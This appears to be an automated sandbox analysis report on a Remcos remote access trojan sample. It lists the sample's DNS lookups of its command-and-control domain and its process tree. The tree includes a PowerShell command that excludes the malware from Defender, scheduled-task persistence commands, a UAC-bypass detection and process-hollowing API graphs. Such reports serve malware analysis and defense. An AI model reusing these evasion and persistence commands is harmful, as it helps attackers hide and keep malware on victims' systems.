                          Jan 11, 2025 03:57:04.532358885 CET192.168.2.71.1.1.10x2ca7Standard query (0)decmainserver.webredirect.orgA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 11, 2025 03:54:50.056602955 CET1.1.1.1192.168.2.70x7509No error (0)decmainserver.webredirect.org69.174.98.48A (IP address)IN (0x0001)false
                          Jan 11, 2025 03:57:04.680432081 CET1.1.1.1192.168.2.70x2ca7No error (0)decmainserver.webredirect.org69.174.98.48A (IP address)IN (0x0001)false

                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:21:54:46
                          Start date:10/01/2025
                          Path:C:\Users\user\Desktop\Nfi2yQDBda.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Nfi2yQDBda.exe"
                          Imagebase:0xd80000
                          File size:1'164'800 bytes
                          MD5 hash:80B1BD15B16559E4BF630C60F7819A84
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:21:54:48
                          Start date:10/01/2025
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"
                          Imagebase:0x490000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:21:54:48
                          Start date:10/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:21:54:48
                          Start date:10/01/2025
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp"
                          Imagebase:0x3f0000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:21:54:48
                          Start date:10/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:21:54:48
                          Start date:10/01/2025
                          Path:C:\Users\user\Desktop\Nfi2yQDBda.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Nfi2yQDBda.exe"
                          Imagebase:0xa30000
                          File size:1'164'800 bytes
                          MD5 hash:80B1BD15B16559E4BF630C60F7819A84
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3807944178.000000000119A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          Target ID:8
                          Start time:21:54:49
                          Start date:10/01/2025
                          Path:C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
                          Imagebase:0xb00000
                          File size:1'164'800 bytes
                          MD5 hash:80B1BD15B16559E4BF630C60F7819A84
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 68%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:21:54:51
                          Start date:10/01/2025
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff7fb730000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:21:54:52
                          Start date:10/01/2025
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpC463.tmp"
                          Imagebase:0x3f0000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:21:54:52
                          Start date:10/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:12
                          Start time:21:54:52
                          Start date:10/01/2025
                          Path:C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"
                          Imagebase:0x2e0000
                          File size:1'164'800 bytes
                          MD5 hash:80B1BD15B16559E4BF630C60F7819A84
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:13
                          Start time:21:54:52
                          Start date:10/01/2025
                          Path:C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"
                          Imagebase:0x5a0000
                          File size:1'164'800 bytes
                          MD5 hash:80B1BD15B16559E4BF630C60F7819A84
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1402490811.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:10.8%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:213
                            Total number of Limit Nodes:16
                            execution_graph 40531 171d810 DuplicateHandle 40532 171d8a6 40531->40532 40443 747e100 40444 747e189 CreateProcessA 40443->40444 40446 747e34b 40444->40446 40533 747d8e0 40534 747d925 Wow64SetThreadContext 40533->40534 40536 747d96d 40534->40536 40447 1714668 40448 171467a 40447->40448 40449 1714686 40448->40449 40453 1714779 40448->40453 40458 1713e1c 40449->40458 40451 17146a5 40454 171479d 40453->40454 40462 1714878 40454->40462 40466 1714888 40454->40466 40459 1713e27 40458->40459 40461 171707e 40459->40461 40474 1715c5c 40459->40474 40461->40451 40463 17148af 40462->40463 40465 171498c 40463->40465 40470 171449c 40463->40470 40468 17148af 40466->40468 40467 171498c 40468->40467 40469 171449c CreateActCtxA 40468->40469 40469->40467 40471 1715918 CreateActCtxA 40470->40471 40473 17159db 40471->40473 40475 1715c61 40474->40475 40480 1715c7c 40475->40480 40477 1717275 40477->40461 40484 1715cac 40477->40484 40479 171735a 40479->40461 40481 1715c87 40480->40481 40482 1715cac GetModuleHandleW 40481->40482 40483 171735a 40482->40483 40483->40477 40485 1715cb7 40484->40485 40488 1715cdc 40485->40488 40487 171744d 40487->40479 40489 1715ce7 40488->40489 40491 171874b 40489->40491 40494 171adf8 40489->40494 40490 1718789 40490->40487 40491->40490 40498 171cee9 40491->40498 40503 171ae30 40494->40503 40506 171ae1f 40494->40506 40495 171ae0e 40495->40491 40499 171cf19 40498->40499 40500 171cf3d 40499->40500 40515 171d097 40499->40515 40519 171d0a8 40499->40519 40500->40490 40510 171af19 40503->40510 40504 171ae3f 40504->40495 40507 171ae30 40506->40507 40509 171af19 GetModuleHandleW 40507->40509 40508 171ae3f 40508->40495 40509->40508 40511 171af39 40510->40511 40512 171af5c 40510->40512 40511->40512 40513 171b160 GetModuleHandleW 40511->40513 40512->40504 40514 171b18d 40513->40514 40514->40504 40517 171d0b5 40515->40517 40516 171d0ef 40516->40500 40517->40516 40523 171bc80 40517->40523 40521 171d0b5 40519->40521 40520 171d0ef 40520->40500 40521->40520 40522 171bc80 GetModuleHandleW 40521->40522 40522->40520 40524 171bc85 40523->40524 40526 171de08 40524->40526 40527 171d2a4 40524->40527 40528 171d2af 40527->40528 40529 1715cdc GetModuleHandleW 40528->40529 40530 171de77 40529->40530 40530->40526 40679 171d5c8 40680 171d60e GetCurrentProcess 40679->40680 40682 171d660 GetCurrentThread 40680->40682 40683 171d659 40680->40683 40684 171d696 40682->40684 40685 171d69d GetCurrentProcess 40682->40685 40683->40682 40684->40685 40686 171d6d3 40685->40686 40687 171d6fb GetCurrentThreadId 40686->40687 40688 171d72c 40687->40688 40537 8741fd8 40541 8742010 40537->40541 40545 8742000 40537->40545 40538 8741ff7 40542 8742019 40541->40542 40549 8742058 40542->40549 40543 874203e 40543->40538 40546 8742009 40545->40546 40548 8742058 DrawTextExW 40546->40548 40547 874203e 40547->40538 40548->40547 40550 8742093 40549->40550 40551 8742082 40549->40551 40550->40551 40557 8742370 40550->40557 40562 874b600 40550->40562 40567 874b610 40550->40567 40573 8742470 40550->40573 40578 8742380 40550->40578 40551->40543 40558 8742379 40557->40558 40559 8742414 40558->40559 40583 8742c10 40558->40583 40588 8742c00 40558->40588 40563 874b610 40562->40563 40564 874b636 40563->40564 40640 874b790 40563->40640 40564->40551 40565 874b68f 40565->40551 40568 874b66d 40567->40568 40569 874b636 40567->40569 40571 874b699 40568->40571 40572 874b790 DrawTextExW 40568->40572 40569->40551 40570 874b68f 40570->40551 40571->40551 40572->40570 40574 87423fd 40573->40574 40575 8742414 40574->40575 40576 8742c10 DrawTextExW 40574->40576 40577 8742c00 DrawTextExW 40574->40577 40576->40575 40577->40575 40579 87423a8 40578->40579 40580 8742414 40579->40580 40581 8742c10 DrawTextExW 40579->40581 40582 8742c00 DrawTextExW 40579->40582 40581->40580 40582->40580 40584 8742c26 40583->40584 40593 8743078 40584->40593 40597 8743068 40584->40597 40585 8742c9c 40585->40559 40589 8742c09 40588->40589 40591 8743078 DrawTextExW 40589->40591 40592 8743068 DrawTextExW 40589->40592 40590 8742c9c 40590->40559 40591->40590 40592->40590 40602 87430b8 40593->40602 40607 87430a8 40593->40607 40594 8743096 40594->40585 40598 8743071 40597->40598 40599 8743096 40598->40599 40600 87430b8 DrawTextExW 40598->40600 40601 87430a8 DrawTextExW 40598->40601 40599->40585 40600->40599 40601->40599 40603 87430e9 40602->40603 40604 8743116 40603->40604 40612 8743138 40603->40612 40617 8743129 40603->40617 40604->40594 40608 87430b1 40607->40608 40609 8743116 40608->40609 40610 8743138 DrawTextExW 40608->40610 40611 8743129 DrawTextExW 40608->40611 40609->40594 40610->40609 40611->40609 40614 8743159 40612->40614 40613 874316e 40613->40604 40614->40613 40622 87412e8 40614->40622 40616 87431d9 40618 8743131 40617->40618 40619 874316e 40618->40619 40620 87412e8 DrawTextExW 40618->40620 40619->40604 40621 87431d9 40620->40621 40624 87412f3 40622->40624 40623 87451a9 40623->40616 40624->40623 40628 8745d20 40624->40628 40632 8745d10 40624->40632 40625 87452bc 40625->40616 40629 8745d24 40628->40629 40636 87447bc 40629->40636 40633 8745d14 40632->40633 40634 87447bc DrawTextExW 40633->40634 40635 8745d3d 40634->40635 40635->40625 40637 8745d58 DrawTextExW 40636->40637 40639 8745d3d 40637->40639 40639->40625 40641 874b794 40640->40641 40645 874bd70 40641->40645 40651 874bd28 40641->40651 40642 874b7e0 40642->40565 40647 874bd95 40645->40647 40646 874bdb9 40646->40642 40647->40646 40657 874f690 40647->40657 40662 874f681 40647->40662 40648 874be76 40652 874bd2d 40651->40652 40653 874bd4e 40652->40653 40655 874f690 DrawTextExW 40652->40655 40656 874f681 DrawTextExW 40652->40656 40653->40642 40654 874be76 40655->40654 40656->40654 40658 874f694 40657->40658 40659 874f8a0 40658->40659 40667 874fc00 40658->40667 40671 874fbf3 40658->40671 40659->40648 40663 874f684 40662->40663 40664 874f8a0 40663->40664 40665 874fc00 DrawTextExW 40663->40665 40666 874fbf3 DrawTextExW 40663->40666 40664->40648 40665->40664 40666->40664 40670 874fc30 40667->40670 40668 874fd7f 40668->40659 40669 8743138 DrawTextExW 40669->40668 40670->40668 40670->40669 40673 874fc30 40671->40673 40672 874fd7f 40672->40659 40673->40672 40674 8743138 DrawTextExW 40673->40674 40674->40672 40689 874b408 40691 874b40c 40689->40691 40690 874b5ad 40691->40690 40694 874b5c8 40691->40694 40698 874b5b8 40691->40698 40695 874b5d1 40694->40695 40696 8742058 DrawTextExW 40695->40696 40697 874b5f5 40696->40697 40697->40691 40699 874b5c8 40698->40699 40700 8742058 DrawTextExW 40699->40700 40701 874b5f5 40700->40701 40701->40691 40675 747df68 40676 747dfb3 ReadProcessMemory 40675->40676 40678 747dff7 40676->40678 40702 747d3f8 40703 747d438 ResumeThread 40702->40703 40705 747d469 40703->40705 40706 747d9b8 40707 747d9f8 VirtualAllocEx 40706->40707 40709 747da35 40707->40709 40710 747da78 40711 747dac0 WriteProcessMemory 40710->40711 40713 747db17 40711->40713

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 343 171d5b9-171d657 GetCurrentProcess 347 171d660-171d694 GetCurrentThread 343->347 348 171d659-171d65f 343->348 349 171d696-171d69c 347->349 350 171d69d-171d6d1 GetCurrentProcess 347->350 348->347 349->350 351 171d6d3-171d6d9 350->351 352 171d6da-171d6f5 call 171d797 350->352 351->352 356 171d6fb-171d72a GetCurrentThreadId 352->356 357 171d733-171d795 356->357 358 171d72c-171d732 356->358 358->357
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 0171D646
                            • GetCurrentThread.KERNEL32 ref: 0171D683
                            • GetCurrentProcess.KERNEL32 ref: 0171D6C0
                            • GetCurrentThreadId.KERNEL32 ref: 0171D719
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: c320a5a5d129b284202debcaffd9df3549eb941ba83f61f914b5add4102a4dcf
                            • Instruction ID: 6b4bbe770407db96f647fe72ae2e377f6c68d850964bb5ab8acf767c38d469b0
                            • Opcode Fuzzy Hash: c320a5a5d129b284202debcaffd9df3549eb941ba83f61f914b5add4102a4dcf
                            • Instruction Fuzzy Hash: 2F5145B1900209DFEB28DFA9D548BDEBBF1EF88304F248459E409AB394D7749944CF65

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 365 171d5c8-171d657 GetCurrentProcess 369 171d660-171d694 GetCurrentThread 365->369 370 171d659-171d65f 365->370 371 171d696-171d69c 369->371 372 171d69d-171d6d1 GetCurrentProcess 369->372 370->369 371->372 373 171d6d3-171d6d9 372->373 374 171d6da-171d6f5 call 171d797 372->374 373->374 378 171d6fb-171d72a GetCurrentThreadId 374->378 379 171d733-171d795 378->379 380 171d72c-171d732 378->380 380->379
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 0171D646
                            • GetCurrentThread.KERNEL32 ref: 0171D683
                            • GetCurrentProcess.KERNEL32 ref: 0171D6C0
                            • GetCurrentThreadId.KERNEL32 ref: 0171D719
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: 3e7a9af19baae373e14dcbc78c8be93eeefddb9288aba2c8bdc7737d035dcdd8
                            • Instruction ID: d77a8a4cfa9ceef0c0ec76a0ca8cdca05e4e0afa93c2a04edbaec383206d1d47
                            • Opcode Fuzzy Hash: 3e7a9af19baae373e14dcbc78c8be93eeefddb9288aba2c8bdc7737d035dcdd8
                            • Instruction Fuzzy Hash: 905145B1900309DFEB28DFAAD548B9EBBF1EF48314F248419E409AB350D7749944CF66

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 789 747e0f4-747e195 793 747e197-747e1a1 789->793 794 747e1ce-747e1ee 789->794 793->794 795 747e1a3-747e1a5 793->795 801 747e227-747e256 794->801 802 747e1f0-747e1fa 794->802 796 747e1a7-747e1b1 795->796 797 747e1c8-747e1cb 795->797 799 747e1b5-747e1c4 796->799 800 747e1b3 796->800 797->794 799->799 803 747e1c6 799->803 800->799 808 747e28f-747e349 CreateProcessA 801->808 809 747e258-747e262 801->809 802->801 804 747e1fc-747e1fe 802->804 803->797 806 747e221-747e224 804->806 807 747e200-747e20a 804->807 806->801 810 747e20e-747e21d 807->810 811 747e20c 807->811 822 747e352-747e3d8 808->822 823 747e34b-747e351 808->823 809->808 813 747e264-747e266 809->813 810->810 812 747e21f 810->812 811->810 812->806 814 747e289-747e28c 813->814 815 747e268-747e272 813->815 814->808 817 747e276-747e285 815->817 818 747e274 815->818 817->817 820 747e287 817->820 818->817 820->814 833 747e3da-747e3de 822->833 834 747e3e8-747e3ec 822->834 823->822 833->834 835 747e3e0 833->835 836 747e3ee-747e3f2 834->836 837 747e3fc-747e400 834->837 835->834 836->837 838 747e3f4 836->838 839 747e402-747e406 837->839 840 747e410-747e414 837->840 838->837 839->840 841 747e408 839->841 842 747e426-747e42d 840->842 843 747e416-747e41c 840->843 841->840 844 747e444 842->844 845 747e42f-747e43e 842->845 843->842 847 747e445 844->847 845->844 847->847
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0747E336
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 3c0cc594893352861f7614c0baf91861fb69503f85778b3ba741ccfe9f08ea59
                            • Instruction ID: 0a25b665886127d7e79a0c4032e10e521e4da5a4a827cd3fd30795531ca98747
                            • Opcode Fuzzy Hash: 3c0cc594893352861f7614c0baf91861fb69503f85778b3ba741ccfe9f08ea59
                            • Instruction Fuzzy Hash: E1A14EB1D00329DFEB14DF68C8417EEBBB2AF44314F1486AAE809A7290D7749985CF91

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 848 747e100-747e195 850 747e197-747e1a1 848->850 851 747e1ce-747e1ee 848->851 850->851 852 747e1a3-747e1a5 850->852 858 747e227-747e256 851->858 859 747e1f0-747e1fa 851->859 853 747e1a7-747e1b1 852->853 854 747e1c8-747e1cb 852->854 856 747e1b5-747e1c4 853->856 857 747e1b3 853->857 854->851 856->856 860 747e1c6 856->860 857->856 865 747e28f-747e349 CreateProcessA 858->865 866 747e258-747e262 858->866 859->858 861 747e1fc-747e1fe 859->861 860->854 863 747e221-747e224 861->863 864 747e200-747e20a 861->864 863->858 867 747e20e-747e21d 864->867 868 747e20c 864->868 879 747e352-747e3d8 865->879 880 747e34b-747e351 865->880 866->865 870 747e264-747e266 866->870 867->867 869 747e21f 867->869 868->867 869->863 871 747e289-747e28c 870->871 872 747e268-747e272 870->872 871->865 874 747e276-747e285 872->874 875 747e274 872->875 874->874 877 747e287 874->877 875->874 877->871 890 747e3da-747e3de 879->890 891 747e3e8-747e3ec 879->891 880->879 890->891 892 747e3e0 890->892 893 747e3ee-747e3f2 891->893 894 747e3fc-747e400 891->894 892->891 893->894 895 747e3f4 893->895 896 747e402-747e406 894->896 897 747e410-747e414 894->897 895->894 896->897 898 747e408 896->898 899 747e426-747e42d 897->899 900 747e416-747e41c 897->900 898->897 901 747e444 899->901 902 747e42f-747e43e 899->902 900->899 904 747e445 901->904 902->901 904->904
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0747E336
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: e9c71df551a6a51ea44416369a8381c7a92dc0e74a7aaf10993c1c56699e8587
                            • Instruction ID: 4e2571ff96501982cd2d85579135873cb3bf66056006aa605cb74cb4d766b5f9
                            • Opcode Fuzzy Hash: e9c71df551a6a51ea44416369a8381c7a92dc0e74a7aaf10993c1c56699e8587
                            • Instruction Fuzzy Hash: 4C913DB1D00329DFEB24DF68C8417EEBBB2BF44314F1486AAE809A7254D7749985CF91
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0171B17E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: c473bd58df73219f7685fa4bd5705eb015eab0d6cf853b6498a6cea3f163771b
                            • Instruction ID: c76f3b64af90978e38232cacfc0e269a9d04aef10d53388e261736d0fa3041f0
                            • Opcode Fuzzy Hash: c473bd58df73219f7685fa4bd5705eb015eab0d6cf853b6498a6cea3f163771b
                            • Instruction Fuzzy Hash: 1F814770A00B458FDB24DF2ED04479ABBF1FF88204F04892EE59AD7A54D735E945CB91
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 017159C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 31a24b47d5c85320378d2641e48f86218ae2caa692549f23b5676acbdda30842
                            • Instruction ID: e22853faf28e435fc576e6e867746b432b099a837595953badbbc624a36c106b
                            • Opcode Fuzzy Hash: 31a24b47d5c85320378d2641e48f86218ae2caa692549f23b5676acbdda30842
                            • Instruction Fuzzy Hash: 1E41D2B1C00719CFEB28CFA9C884BCDBBB2BF89304F24815AD408AB255DB755946CF50
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 017159C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: d426f25027eacc71fd5e7be2dac6195c92c8ee1b94cf2818efb1a10fa1834a2a
                            • Instruction ID: 32cc26d3c45bd0817db786e3fca056d83f034e79678db982e566ad1432e31ded
                            • Opcode Fuzzy Hash: d426f25027eacc71fd5e7be2dac6195c92c8ee1b94cf2818efb1a10fa1834a2a
                            • Instruction Fuzzy Hash: EA41B071C0471DCFEB28DFA9C884B9DBBB5BF89304F20806AD408AB255DB756946CF90
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0747DB08
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: d186db2432015ab16fd10de60ecc5d39bad484b7055b21971829473fc2b0319c
                            • Instruction ID: 063cafc582329a270569b0f590a11114e8040a08cf1c5c2e3e574787acbdea62
                            • Opcode Fuzzy Hash: d186db2432015ab16fd10de60ecc5d39bad484b7055b21971829473fc2b0319c
                            • Instruction Fuzzy Hash: 022126B1D003099FDB10DFA9C881BEEBBF5FF48310F14842AE919A7241C7799541CBA5
                            APIs
                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,08745D3D,?,?), ref: 08745DEF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1383643160.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8740000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: DrawText
                            • String ID:
                            • API String ID: 2175133113-0
                            • Opcode ID: b96984c04b6c7077f1af5450e6d393916fc5a14998cbbc8885f236f0b4dabb13
                            • Instruction ID: d10fe0634cb19bee8587c5ff0d6fc8f14380832bfef2bdc412a661d5b0a9d3d0
                            • Opcode Fuzzy Hash: b96984c04b6c7077f1af5450e6d393916fc5a14998cbbc8885f236f0b4dabb13
                            • Instruction Fuzzy Hash: FD31BDB59042499FDB10CF9AD884AAEBBF5FF48220F14842EE919A7310D775A945CFA0
                            APIs
                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,08745D3D,?,?), ref: 08745DEF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1383643160.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8740000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: DrawText
                            • String ID:
                            • API String ID: 2175133113-0
                            • Opcode ID: 4587913213d11b6fcef9a71256cdaf799784e9c0710baf434c70236158cee534
                            • Instruction ID: 9ae90f0175cbb7e65a448b923296c328febc8430883a2f4ed3cb2b6b90669c10
                            • Opcode Fuzzy Hash: 4587913213d11b6fcef9a71256cdaf799784e9c0710baf434c70236158cee534
                            • Instruction Fuzzy Hash: 9631BDB6D002099FDB10CF9AD984ADEBBF5BF48220F14842AE919A7210D375A945CFA0
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0747DB08
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: ff7f0eb44dc7ca52d67192e695ddd0fcacfa19cc6ce2a25938417af273cb6720
                            • Instruction ID: 8f3e60331cdc5526718ae01b6228f343f5ad2b564f309b438370909557e86968
